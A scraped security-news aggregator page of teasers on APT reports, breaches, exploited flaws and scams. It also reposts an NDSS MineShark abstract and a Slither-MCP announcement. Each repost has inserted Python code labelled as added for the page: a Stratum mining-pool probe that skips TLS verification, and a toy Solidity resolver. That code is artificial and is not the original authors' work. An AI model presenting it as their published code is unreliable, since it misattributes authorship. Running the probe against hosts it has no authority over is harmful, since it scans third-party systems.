ESET APT Activity Report Q4 2024–Q1 2025: Malware sharing, wipers and exploits

ESET experts discuss Sandworm’s new data wiper, relentless campaigns by UnsolicitedBooker, attribution challenges amid tool-sharing, and other key findings from the latest APT Activity Report

Read More
This month in security with Tony Anscombe – June 2025 edition

From Australia's new ransomware payment disclosure rules to another record-breaking DDoS attack, June 2025 saw no shortage of interesting cybersecurity news

Read More
ESET Threat Report H1 2025

A view of the H1 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts

Read More
BladedFeline: Whispering in the dark

ESET researchers analyzed a cyberespionage campaign conducted by BladedFeline, an Iran-aligned APT group with likely ties to OilRig

Read More
Don’t let dormant accounts become a doorway for cybercriminals

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

Read More
This month in security with Tony Anscombe – May 2025 edition

From a flurry of attacks targeting UK retailers to campaigns corralling end-of-life routers into botnets, it's a wrap on another month filled with impactful cybersecurity news

Read More
Word to the wise: Beware of fake Docusign emails

Cybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data

Read More
Danabot under the microscope

ESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure

Read More
Danabot: Analyzing a fallen empire

ESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation

Read More
Lumma Stealer: Down for the count

The bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies

Read More
ESET takes part in global operation to disrupt Lumma Stealer

Our intense monitoring of tens of thousands of malicious samples helped this global disruption operation

Read More
The who, where, and how of APT attacks in Q4 2024–Q1 2025

ESET Chief Security Evangelist Tony Anscombe highlights key findings from the latest issue of the ESET APT Activity Report

Read More
ESET APT Activity Report Q4 2024–Q1 2025

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025

Read More
Sednit abuses XSS flaws to hit gov't entities, defense companies

Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU

Read More
Operation RoundPress

ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities

Read More
How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2)

Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world.

Read More
Catching a phish with many faces

Here’s a brief dive into the murky waters of shape-shifting attacks that leverage dedicated phishing kits to auto-generate customized login pages on the fly

Read More
Beware of phone scams demanding money for ‘missed jury duty’

When we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.

Read More
Toll road scams are in overdrive: Here’s how to protect yourself

Have you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam.

Read More
RSAC 2025 wrap-up – Week in security with Tony Anscombe

From the power of collaborative defense to identity security and AI, catch up on the event's key themes and discussions

Read More
TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks

ESET researchers analyzed Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks

Read More
This month in security with Tony Anscombe – April 2025 edition

From the near-demise of MITRE's CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity

Read More
How safe and secure is your iPhone really?

Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.

Read More
Deepfake 'doctors' take to TikTok to peddle bogus cures

Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements

Read More
How fraudsters abuse Google Forms to spread scams

The form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe.

Read More
Will super-smart AI be attacking us anytime soon?

What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.

Read More
CapCut copycats are on the prowl

Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead

Read More
They’re coming for your data: What are infostealers and how do I stay safe?

Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data

Read More
Attacks on the education sector are surging: How can cyber-defenders respond?

Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?

Read More
Watch out for these traps lurking in search results

Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results

Read More
So your friend has been hacked: Could you be next?

When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.

Read More
What impact does Agentic AI have on cloud-native security

How Can Organizations Safeguard Non-Human Identities in the Age of Agentic AI? How can robust management of Non-Human Identities (NHIs) and Secrets Security Management tighten your organization’s cybersecurity defenses? While the concept might sound futuristic, the impact is very real, especially in cloud-native environments. Let’s unravel how effective management of NHIs can mitigate potential security […]

The post What impact does Agentic AI have on cloud-native security appeared first on Entro.

The post What impact does Agentic AI have on cloud-native security appeared first on Security Boulevard.

Read More
Why is Agentic AI critical for future cybersecurity

Have You Considered the Impact of Non-Human Identities on Cybersecurity? The future of cybersecurity is being reshaped by the rise of Agentic AI, but how does this affect our approach to managing Non-Human Identities (NHIs)? As cybersecurity demands evolve, professionals are pushed to rethink their strategies to accommodate this shift. I’ve seen how negligence in […]

The post Why is Agentic AI critical for future cybersecurity appeared first on Entro.

The post Why is Agentic AI critical for future cybersecurity appeared first on Security Boulevard.

Read More
How do you scale Non-Human Identity management safely

Are Non-Human Identities the Hidden Vulnerability in Your Cybersecurity Strategy? Non-Human Identities (NHIs) have emerged as a crucial component of cybersecurity. But how well are they being managed? This question confronts organizations across industries such as financial services, healthcare, and travel, where the management of NHIs can be the linchpin of an effective security strategy. […]

The post How do you scale Non-Human Identity management safely appeared first on Entro.

The post How do you scale Non-Human Identity management safely appeared first on Security Boulevard.

Read More
How does Secrets Management contribute to compliance

Are You Managing Non-Human Identities with the Care They Deserve? Digital interconnectedness has brought a growing emphasis on cybersecurity measures that ensure both data integrity and user privacy. As more organizations migrate their operations to cloud environments, the focus on protecting machine identities, often referred to as Non-Human Identities (NHIs), becomes paramount. This shift is […]

The post How does Secrets Management contribute to compliance appeared first on Entro.

The post How does Secrets Management contribute to compliance appeared first on Security Boulevard.

Read More
A Single Bug in Mobile Apps Can Cost You Millions! Protect with Secure Code Review!

A leading banking app was forced into a three-day shutdown after attackers exploited a small coding oversight that granted access to customer accounts. The flaw had quietly existed in the codebase for months, completely slipping past the development team. What made the incident even more frustrating was that a simple peer review could have identified […]

The post A Single Bug in Mobile Apps Can Cost You Millions! Protect with Secure Code Review! appeared first on Kratikal Blogs.

The post A Single Bug in Mobile Apps Can Cost You Millions! Protect with Secure Code Review! appeared first on Security Boulevard.

Read More
NDSS 2025 – MineShark: Cryptomining Traffic Detection At Scale

SESSION
Session 3A: Network Security 1

Authors, Creators & Presenters: Shaoke Xi (Zhejiang University), Tianyi Fu (Zhejiang University), Kai Bu (Zhejiang University), Chunling Yang (Zhejiang University), Zhihua Chang (Zhejiang University), Wenzhi Chen (Zhejiang University), Zhou Ma (Zhejiang University), Chongjie Chen (HANG ZHOU CITY BRAIN CO., LTD), Yongsheng Shen (HANG ZHOU CITY BRAIN CO., LTD), Kui Ren (Zhejiang University)

----
PAPER
-----

MineShark: Cryptomining Traffic Detection at Scale
The rapid growth of cryptojacking and the increase in regulatory bans on cryptomining have prompted organizations to enhance detection ability within their networks. Traditional methods, including rule-based detection and deep packet inspection, fall short in timely and comprehensively identifying new and encrypted mining threats. In contrast, learning-based techniques show promise by identifying content-agnostic traffic patterns, adapting to a wide range of cryptomining configurations. However, existing learning-based systems often lack scalability in real-world detection, primarily due to challenges with unlabeled, imbalanced, and high-speed traffic inputs. To address these issues, we introduce MineShark, a system that identifies robust patterns of mining traffic to distinguish between vast quantities of benign traffic and automates the confirmation of model outcomes through active probing to prevent an overload of model alarms. As model inference labels are progressively confirmed, MineShark conducts self-improving updates to enhance model accuracy. MineShark is capable of line-rate detection at various traffic volume scales with the allocation of different amounts of CPU and GPU resources. In a 10 Gbps campus network deployment lasting ten months, MineShark detected cryptomining connections toward 105 mining pools ahead of concurrently deployed commercial systems, 17.6% of which were encrypted. It automatically filtered over 99.3% of false alarms and achieved an average packet processing throughput of 1.3 Mpps, meeting the line-rate demands of a 10 Gbps network, with a negligible loss rate of 0.2%. We publicize MineShark for broader use.
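The abstract's active-probing step (confirming that a suspected destination really is a mining pool before an alarm is raised) can be made concrete with a Stratum v1 handshake. The following is an added example written for this page; it is not MineShark's code and its structure is assumed, not taken from the paper. It sends the standard `mining.subscribe` JSON-RPC request that Bitcoin-style pools expect and accepts the destination only if the reply parses as a subscribe result or a `mining.*` notification. The `FAKE_*` replies are constructed for offline checks, not captured traffic; `probe_stratum` needs network access. Monero-style pools use a `login` method instead and would not be confirmed by this probe, which is the sort of gap a content-agnostic traffic model is meant to cover.

```python
import json
import socket
import ssl

# Stratum v1 (Bitcoin-style pools): one JSON-RPC object per line, newline-terminated.
SUBSCRIBE = {"id": 1, "method": "mining.subscribe", "params": ["probe/1.0"]}


def build_probe():
    """The mining.subscribe request a miner sends first; the pool's reply confirms the protocol."""
    return (json.dumps(SUBSCRIBE) + "\n").encode()


def classify_reply(raw):
    """Return "stratum" when `raw` contains a Stratum subscribe result or a mining.* notification,
    else "unknown". A subscribe result is [subscriptions, extranonce1, extranonce2_size]; a bare
    JSON-RPC error or a non-JSON banner (HTTP, TLS, SSH) is not enough to confirm a pool."""
    for line in raw.split(b"\n"):
        line = line.strip()
        if not line:
            continue
        try:
            msg = json.loads(line)
        except ValueError:
            return "unknown"
        if not isinstance(msg, dict):
            return "unknown"
        if msg.get("method") in ("mining.notify", "mining.set_difficulty"):
            return "stratum"
        result = msg.get("result")
        if msg.get("id") == 1 and isinstance(result, list) and len(result) >= 3:
            if isinstance(result[1], str) and isinstance(result[2], int):
                return "stratum"
    return "unknown"


def probe_stratum(host, port, tls=False, timeout=3.0):
    """Connect to a suspected pool, send the probe, read the first line(s) and classify.
    Needs network access; the constructed replies below exercise the classifier offline."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if tls:  # encrypted pools (the paper reports 17.6%) take the same probe over TLS
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE  # pools commonly use self-signed certificates
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_probe())
        buf = b""
        try:
            while len(buf) < 4096 and b"\n" not in buf:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
    return classify_reply(buf)


# Constructed replies for offline checks; these are not captured traffic.
FAKE_POOL_REPLY = (
    b'{"id":1,"result":[[["mining.set_difficulty","b4b6693b"],["mining.notify","ae6812eb"]],'
    b'"08000002",4],"error":null}\n'
    b'{"id":null,"method":"mining.set_difficulty","params":[1024]}\n'
)
FAKE_HTTP_REPLY = b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
FAKE_JSONRPC_REPLY = b'{"id":1,"result":null,"error":[-32601,"Method not found",null]}\n'

if __name__ == "__main__":
    for name, reply in [("pool", FAKE_POOL_REPLY), ("http", FAKE_HTTP_REPLY), ("jsonrpc", FAKE_JSONRPC_REPLY)]:
        print(name, "->", classify_reply(reply))
```

The classifier deliberately refuses to confirm on a generic JSON-RPC error: many non-mining services speak JSON-RPC, and the point of the probe is to filter model false alarms, so only protocol-specific structure counts as confirmation.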

-----
ABOUT NDSS
-----

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

-----

Our thanks to the **[Network and Distributed System Security (NDSS) Symposium][1]** for publishing their Creators, Authors and Presenters’ superb **[NDSS Symposium 2025 Conference][2]** content on the **[organization’s][1]** **[YouTube][3]** channel.


The post NDSS 2025 – MineShark: Cryptomining Traffic Detection At Scale appeared first on Security Boulevard.

Read More
Level up your Solidity LLM tooling with Slither-MCP

We’re releasing Slither-MCP, a new tool that augments LLMs with Slither’s unmatched static analysis engine. Slither-MCP benefits virtually every use case for LLMs by exposing Slither’s static analysis API via tools, allowing LLMs to find critical code faster, navigate codebases more efficiently, and ultimately improve smart contract authoring and auditing performance.

How Slither-MCP works

Slither-MCP is an MCP server that wraps Slither’s static analysis functionality, making it accessible through the Model Context Protocol. It can analyze Solidity projects (Foundry, Hardhat, etc.) and generate comprehensive metadata about contracts, functions, inheritance hierarchies, and more.

When an LLM uses Slither-MCP, it no longer has to rely on rudimentary tools like grep and read_file to identify where certain functions are implemented, who a function’s callers are, and other complex, error-prone tasks.

Because LLMs are probabilistic systems, in most cases they are only probabilistically correct. Slither-MCP helps set a ground truth for LLM-based analysis using traditional static analysis: it reduces token use and increases the probability a prompt is answered correctly.

Example: Simplifying an auditing task

Consider a project that contains two ERC20 contracts: one used in the production deployment, and one used in tests. An LLM is tasked with auditing a contract’s use of ERC20.transfer(), and needs to locate the source code of the function.

Without Slither-MCP, the LLM has two options:

  1. Try to resolve the import path of the ERC20 contract, then call read_file to view the source of ERC20.transfer(). This option usually requires multiple calls to read_file, especially if the call to ERC20.transfer() goes through a child contract that inherits from ERC20. Either way, this option is error-prone and tool-call intensive.

  2. Try to use the grep tool to locate the implementation of ERC20.transfer(). Depending on how the grep tool call is structured, it may return the wrong ERC20 contract.

Both options are less than ideal and error-prone, and neither is likely to be correct with a high degree of confidence.

Using Slither-MCP, the LLM simply calls get_function_source to locate the source code of the function.
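To show why grep is the wrong tool for this lookup, here is an added example written for this page; it is not Slither's or Slither-MCP's code, and its `PROJECT`, contract names and helper functions are constructed for illustration. It indexes a tiny Solidity project in which both a production ERC20 and a test mock define transfer(), then contrasts the grep-style answer (every definition, mock included) with resolving Token.transfer through the inheritance chain, which is the kind of ground truth a static analyzer provides and get_function_source returns.

```python
import re

# Constructed sample project (not real code): two contracts define transfer(),
# one in the production ERC20 and one in a test mock, as in the auditing scenario above.
PROJECT = {
    "src/ERC20.sol": """
contract ERC20 {
    mapping(address => uint256) internal _balances;
    function transfer(address to, uint256 amount) public returns (bool) {
        _balances[msg.sender] -= amount;
        _balances[to] += amount;
        return true;
    }
}
""",
    "src/Token.sol": """
import "./ERC20.sol";
contract Ownable { address public owner; }
contract Token is Ownable, ERC20 {
    function mint(address to, uint256 amount) public { _balances[to] += amount; }
}
""",
    "test/MockERC20.sol": """
contract MockERC20 {
    function transfer(address, uint256) public pure returns (bool) { return true; }
}
""",
}

CONTRACT_RE = re.compile(r"\bcontract\s+(\w+)(?:\s+is\s+([\w\s,]+?))?\s*\{")
FUNCTION_RE = re.compile(r"\bfunction\s+(\w+)\s*\(")


def _balanced_body(src, start):
    """Return (text, end) for the brace block that opens at src[start] == '{'."""
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start:i + 1], i + 1
    raise ValueError("unbalanced braces at %d" % start)


def index_project(project):
    """Map contract name -> {file, bases, functions{name: source}} across all files.
    A toy stand-in for the metadata a real static analyzer such as Slither produces."""
    index = {}
    for path, src in project.items():
        for m in CONTRACT_RE.finditer(src):
            body, _ = _balanced_body(src, m.end() - 1)
            bases = [b.strip() for b in (m.group(2) or "").split(",") if b.strip()]
            functions = {}
            for f in FUNCTION_RE.finditer(body):
                _, end = _balanced_body(body, body.index("{", f.end()))
                functions[f.group(1)] = body[f.start():end]
            index[m.group(1)] = {"file": path, "bases": bases, "functions": functions}
    return index


def grep_definitions(index, name):
    """The grep-style answer: every contract anywhere that defines `name`, test mocks included."""
    return [(info["file"], c) for c, info in index.items() if name in info["functions"]]


def resolve_function(index, contract, name, _seen=None):
    """Resolve `contract.name` as the compiler would: the contract itself first, then its
    bases, most-derived first (the `is` list right to left). Full C3 linearization is omitted;
    for the simple hierarchy in the sample this gives the same result."""
    if _seen is None:
        _seen = set()
    if contract in _seen or contract not in index:
        return None
    _seen.add(contract)
    info = index[contract]
    if name in info["functions"]:
        return info["file"], contract, info["functions"][name]
    for base in reversed(info["bases"]):
        found = resolve_function(index, base, name, _seen)
        if found:
            return found
    return None


if __name__ == "__main__":
    idx = index_project(PROJECT)
    print("grep-style matches for transfer:", grep_definitions(idx, "transfer"))
    print("resolved Token.transfer ->", resolve_function(idx, "Token", "transfer")[:2])
```

The grep path returns two candidates and leaves the LLM to guess; the resolver returns exactly the ERC20.transfer that Token actually inherits, with its file and source, in one call. Real Solidity needs a parser and C3 linearization rather than regexes, which is the work Slither already does.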

Simple setup

Slither-MCP is easy to set up, and can be added to Claude Code using the following command:

claude mcp add --transport stdio slither -- uvx --from git+https://github.com/trailofbits/slither-mcp slither-mcp

It is also easy to add Slither-MCP to Cursor by adding the following to your ~/.cursor/mcp.json:

{
  "mcpServers": {
    "slither-mcp": {
      "command": "uvx --from git+https://github.com/trailofbits/slither-mcp slither-mcp",
      "env": {
        "PYTHONUNBUFFERED": "1"
      }
    }
  }
}
Figure 1: Adding Slither-MCP to Cursor

For now, Slither-MCP exposes a subset of Slither’s analysis engine that we believe LLMs would have the most benefit consuming. This includes the following functionalities:

  • Extracting the source code of a given contract or function for analysis

  • Identifying the callers and callees of a function

  • Identifying the contract’s derived and inherited members

  • Locating potential implementations of a function based on signature (e.g., finding concrete definitions for IOracle.price(...))

  • Running Slither’s exhaustive suite of detectors and filtering the results

If you have requests or suggestions for new MCP tools, we’d love to hear from you.

Licensing

Slither-MCP is licensed AGPLv3, the same license Slither uses. This license requires publishing the full source code of your application if you use it in a web service or SaaS product. For many tools, this isn’t an acceptable compromise.

To help remediate this, we are now offering dual licensing for both Slither and Slither-MCP. By offering dual licensing, Slither and Slither-MCP can be used to power LLM-based security web apps without publishing your entire source code, and without having to spend years reproducing its feature set.

If you are currently using Slither in your commercial web application, or are interested in using it, please reach out.

The post Level up your Solidity LLM tooling with Slither-MCP appeared first on Security Boulevard.

Read More
Conduent Faces Financial Hit, Lawsuits from Breach Affecting 10.5 Million


The intrusion a year ago into Conduent Business Solutions' systems, likely by the SafePay ransomware group, that affected more than 10.5 million individuals will likely cost the company more than $50 million in related expenses and millions more to settle the lawsuits that are piling up.

The post Conduent Faces Financial Hit, Lawsuits from Breach Affecting 10.5 Million appeared first on Security Boulevard.

Read More
FedRAMP Deviation Requests: When and How to Submit

FedRAMP is a government-wide program meant to ensure a standardized baseline for information security throughout the cloud service providers working with the federal government. It’s a tall order. Setting forth standards that are robust enough to cover all the bases, while being open and flexible enough to cover every CSP, is not easy. NIST has […]

The post FedRAMP Deviation Requests: When and How to Submit appeared first on Security Boulevard.

Read More
Deriving Value from Enhanced NHI Security Protocols

How Does the Management of Non-Human Identities (NHIs) Bridge Security Gaps? Cybersecurity is complex and multifaceted. Where machines and applications continuously interact and communicate with one another across various platforms, one may wonder how we can effectively manage these interactions to minimize security vulnerabilities. The concept of Non-Human Identities (NHIs) provides an intriguing solution when […]

The post Deriving Value from Enhanced NHI Security Protocols appeared first on Entro.

The post Deriving Value from Enhanced NHI Security Protocols appeared first on Security Boulevard.

Read More
Microsoft: Windows 10 KB5068781 ESU update may fail with 0x800f0922 errors

Microsoft has confirmed it is investigating a bug causing the Windows 10 KB5068781 extended security update to fail to install with 0x800f0922 errors on devices with corporate licensing. [...]

Read More
Decades-old ‘Finger’ protocol abused in ClickFix malware attacks

The decades-old "finger" command is making a comeback, with threat actors using the protocol to retrieve remote commands to execute on Windows devices. [...]

Read More
Jaguar Land Rover cyberattack cost the company over $220 million

Jaguar Land Rover (JLR) published its financial results for July 1 to September 30, warning that the cost of a recent cyberattack totaled £196 million ($220 million) in the quarter. [...]

Logitech confirms data breach after Clop extortion attack

Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July. [...]

Five plead guilty to helping North Koreans infiltrate US firms

The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea's illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft. [...]

Anthropic claims of Claude AI-automated cyberattacks met with doubt

Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model. [...]

Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks

Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited. [...]

Checkout.com snubs hackers after data breach, to donate ransom instead

UK financial technology company Checkout announced that the ShinyHunters threat group has breached one of its legacy cloud storage systems and is now extorting the company for a ransom. [...]

US announces new strike force targeting Chinese crypto scammers

U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually. [...]

Google backpedals on new Android developer registration rules

Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs. [...]

ASUS warns of critical auth bypass flaw in DSL series routers

ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models. [...]

DoorDash hit by new data breach in October exposing user information

DoorDash has disclosed a data breach that hit the food delivery platform this October. Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly discovered security incident. [...]

Fortinet FortiWeb flaw with public PoC exploited to create admin users

A Fortinet FortiWeb path traversal vulnerability is being actively exploited to create new administrative users on exposed devices without requiring authentication [...]

Google now lets you add friends as contacts for account recovery

Google now lets you recover your accounts using your phone number or trusted contacts.

Cyber giant F5 Networks says government hackers had ‘long-term’ access to its systems, stole code and customer data

The company, which provides cybersecurity defenses to most of the Fortune 500, said the DOJ allowed it to delay notifying the public on national security grounds.

A breach every month raises doubts about South Korea’s digital defenses

Known for its blazing fast internet and home to some of the world’s biggest tech giants, South Korea has also faced a string of data breaches and cybersecurity lapses, as its defenses have struggled to match the pace of its digital ambitions.

Proton releases a new app for two-factor authentication

Proton has a free authenticator app, which is available cross-platform with end-to-end encryption protection for data.

Knox lands $6.5M to compete with Palantir in the federal compliance market

Irina Denisenko, CEO of Knox, launched the federal managed cloud provider last year with a mission to help software vendors get through the FedRAMP security authorization process in just three months, and at a fraction of what it would cost to do it on their own.

Google is adding new device-level features for its Advanced Protection program

At the Android Show, taking place ahead of Google I/O 2025, Google announced that it is adding new device-specific features to its Advanced Protection program, which is designed to protect public figures such as politicians and journalists from different digital threats, with the Android 16 release. The new features include a new way of storing […]

Google announces new security features for Android for protection against scam and theft

At the Android Show on Tuesday, ahead of Google I/O, Google announced new security and privacy features for Android. These new features include new protections for calls, screen sharing, messages, device access, and system-level permissions. With these features, Google aims to protect users from falling for a scam, keep their details secure in case a […]

A 25-year-old police drone founder just raised $75M led by Index

If you ever call 911 from an area that’s hard to get to, you might hear the buzz of a drone well before a police cruiser pulls up. And there’s a good chance that it will be one made by Brinc Drones, a Seattle-based startup founded by 25-year-old Blake Resnick, who dropped out of college […]

A new security fund opens up to help protect the fediverse

A new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.

How to tell if your online accounts have been hacked

This is a guide on how to check whether someone compromised your online accounts.

Hackers are ramping up attacks using year-old ServiceNow security bugs to target unpatched systems

Threat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity

US teachers’ union says hackers stole sensitive personal data on over 500,000 members

PSEA says it "took steps to ensure" its stolen data was deleted, suggesting a ransom demand was paid

CISA scrambles to contact fired employees after court rules layoffs ‘unlawful’

Federal court rules U.S. cybersecurity agency must re-hire over 100 former employees

DOGE axes CISA ‘red team’ staffers amid ongoing federal cuts

Affected staff say more than 100 employees working to protect U.S. government networks were ‘axed’ with no prior warning

What PowerSchool won’t say about its data breach affecting millions of students

New details have emerged about PowerSchool's data breach — but here's what PowerSchool still isn't saying.

Hacker accessed PowerSchool’s network months before massive December breach

CrowdStrike says a hacker had access to PowerSchool's internal system as far back as August.

Japanese telco giant NTT Com says hackers accessed details of almost 18,000 organizations

Unidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers

FBI says scammers are targeting US executives with fake BianLian ransom notes

The FBI is warning that scammers are impersonating the BianLian ransomware gang using fake ransom notes sent to U.S. corporate executives. The fake ransom notes, first reported by U.S. cybersecurity company GuidePoint Security, claim that hackers have gained access to an organization’s network to steal sensitive data, and threaten to publish the stolen data unless […]

UK quietly scrubs encryption advice from government websites

The UK is no longer recommending the use of encryption for at-risk groups following its iCloud backdoor demands

Broadcom urges VMware customers to patch ‘emergency’ zero-day bugs under active exploitation

Security experts warn of ‘huge impact’ of actively exploited hypervisor flaws that allow sandbox escape

KoDDoS was in Paris yesterday for Tech Show Paris 2025

Barely back from Miami, where CloudFest 2025 was held, our teams were yesterday in Paris for Tech Show Paris 2025, a key European gathering where strategic vision, technological innovation and real operational feedback truly intersect. Tech Show Paris is one of the most influential events in Europe for cloud, cybersecurity, data and infrastructure professionals. The …

The post KoDDoS was in Paris yesterday for Tech Show Paris 2025 appeared first on KoDDoS Blog.

KoDDoS at CloudFest USA in Miami

KoDDoS is currently on-site at CloudFest USA in Miami. CloudFest USA is recognized as the most strategic event for the internet infrastructure, cloud hosting, and digital sovereignty ecosystem. Here in Miami, industry leaders gather to shape the next phase of the Internet: business models, network architecture, cybersecurity, resilience, independence and trust. Miami itself is symbolic: …

The post KoDDoS at CloudFest USA in Miami appeared first on KoDDoS Blog.

KoDDoS, MSP Global and CloudFest: a Strategic Partnership for the Future of the Cloud

KoDDoS is proud to announce its partnership with MSP Global and CloudFest, two key players in the digital technology and cloud services industry. This collaboration marks an important step toward strengthening ties within the global tech ecosystem, bringing together experts, service providers, and decision-makers to address the cloud’s most strategic challenges. Through this partnership, we …

The post KoDDoS, MSP Global and CloudFest: a Strategic Partnership for the Future of the Cloud appeared first on KoDDoS Blog.

Recap of Our Presence at VivaTech 2025

Our Core Expertise: Offshore Hosting & Advanced Cybersecurity. At KoDDoS, we’ve built our reputation on two complementary pillars: 🛡️ Robust Cybersecurity Capabilities. For over a decade, we’ve been protecting digital infrastructure with cutting-edge security technologies: 🌐 Resilient and Sovereign Offshore Hosting. Our global infrastructure is distributed across strategic offshore data centers in: This setup offers …

The post Recap of Our Presence at VivaTech 2025 appeared first on KoDDoS Blog.

KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges.

Paris, June 2025 – From June 11 to 14, Paris will once again become the global epicenter of technological innovation with the return of VivaTechnology 2025, held at Paris Expo Porte de Versailles. Bringing together major tech companies, disruptive startups, global investors, and public institutions, the event stands out as a pivotal moment for the …

The post KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges. appeared first on KoDDoS Blog.

Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe

Video games are more than entertainment; they’re a $200 billion global industry. But as gaming grows, so do cyberattacks. Hackers now see games as goldmines for stealing data, extorting companies, and exploiting players. According to Infosecurity Magazine, Akamai’s 2024 report shows that attacks on gaming platforms are rising alarmingly. In 2024 alone, the industry suffered …

The post Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe appeared first on KoDDoS Blog.

How Social Media Use Can Create Hidden Cybersecurity Risks

Social media is all around us, helping us stay connected, updated, and entertained. But beneath the endless scroll, a darker reality exists. Hidden cybersecurity threats are growing, some obvious, others much harder to spot. The risks are especially alarming for young users. According to the National Institutes of Health, up to 95% of teens aged …

The post How Social Media Use Can Create Hidden Cybersecurity Risks appeared first on KoDDoS Blog.

KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem

From April 1st to 3rd, 2025, KoDDoS, a provider of specialized services in DDoS protection and secure offshore hosting, marked its presence at the InCyber Europe Forum, held at the Lille Grand Palais. A true crossroads of cyber innovation and cooperation, the event is the largest cybersecurity event in Europe. A benchmark event on an …

The post KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem appeared first on KoDDoS Blog.

Looking back at CloudFest 2025: An essential event for the future of the cloud!

CloudFest is one of the world’s largest cloud computing events. Every year, it brings together the industry’s leading players to discuss the latest technological advancements, emerging trends, and market challenges. In 2025, the event once again cemented its leadership status by providing a dynamic platform for professional exchange and cloud innovation. This edition featured captivating …

The post Looking back at CloudFest 2025: An essential event for the future of the cloud! appeared first on KoDDoS Blog.

KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.

KoDDoS recently strengthened its commitment to the European tech scene by participating in several major events in France. Our team was honored to be invited to key gatherings in the tech industry, highlighting the importance of innovation and cybersecurity in the evolving digital ecosystem. This strategic tour in Paris allowed us to meet top-tier partners, …

The post KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris. appeared first on KoDDoS Blog.

The UK’s Four-Step Framework for Supply Chain Resilience

Ransomware attacks can ripple through supply chains, causing serious disruption and massive financial consequences for multiple businesses in one fell swoop. As such, CISOs are spending more time considering how to keep operations secure as ecosystems span across dozens, if not hundreds, of vendors, contractors, and digital dependencies. With this in mind, the UK government has released a strategic framework to help organizations secure their supply chains. Let’s explore that guidance. Step 1: Understand why supply chain security is important Your security is only as strong as the weakest...

Security vs. Compliance: What's the Difference?

Security and compliance—a phrase often uttered in the same breath as if they are two sides of the same coin, two members of the same team, or two great tastes that go great together. The truth is, they can be. But it takes some effort. How can security and compliance teams work together to create a winning alliance, protect data, develop according to modern practices, and still pass an audit? This blog will give you a start. A Real-World Scenario of Compliance and Security Living Two Separate Lives As much as I would like to see auditors, developers, and security analysts living in harmony...

Continuous PCI DSS Compliance with File Integrity Monitoring

